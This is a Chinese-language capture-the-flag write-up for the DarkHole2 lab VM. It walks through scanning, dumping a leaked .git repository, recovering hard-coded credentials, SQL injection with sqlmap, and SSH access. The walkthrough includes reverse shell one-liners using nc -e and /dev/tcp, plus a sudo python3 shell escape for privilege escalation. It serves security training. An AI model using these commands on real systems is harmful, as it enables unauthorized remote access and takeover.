题目描述

知识点
- git泄露
- 记得查看history
- sudo提权
- sql注入(手工或者sqlmap)
解题记录
准备
攻击机:KALI 192.168.1.1
靶机:DARKHOLE2 192.168.1.28/
解题
访问靶机

使用nmap进行扫描,发现开启了22和80端口,同时发现git文件泄露
nmap -Pn -n -sS -A 192.168.1.28


git泄露工作主要有以下几个,其中比较好用的还是git-dumper
和GitHacker
。

使用git-dumper
下载源码进行审计
git-dumper http://192.168.1.28/.git/ webb
接下来还是常规套路走一波,爆破路径
dirb http://192.168.1.28

发现刚才的git路径和login页面

查看git
下载的文件夹ls -al

分别查看这几个页面

可以看到mysql的用户名是root
没有密码,数据库是darkhole_2

logout.php
中没有太多重要信息

尝试查看git log记录,看到有一个commit是增加了安全性,可以查看修改前的文件


git checkout

继续查看login.php
可以看到明文用户名和密码,其实这种情况很常见,在开发前期为了方便是会把重要信息直接写在文件中的。

email: lush@admin.com
password: 321
使用该账户密码登陆

使用sqlmap爆破

爆破表名

dump两个表的数据


使用ssh登陆

反弹shell
nc -e /bin/bash 192.168.0.4 7777
bash -i >& /dev/tcp/ip/port 0>&1


查看历史

sudo -l
提权

sudo python3 -c 'import os; os.system("/bin/sh")'

网友评论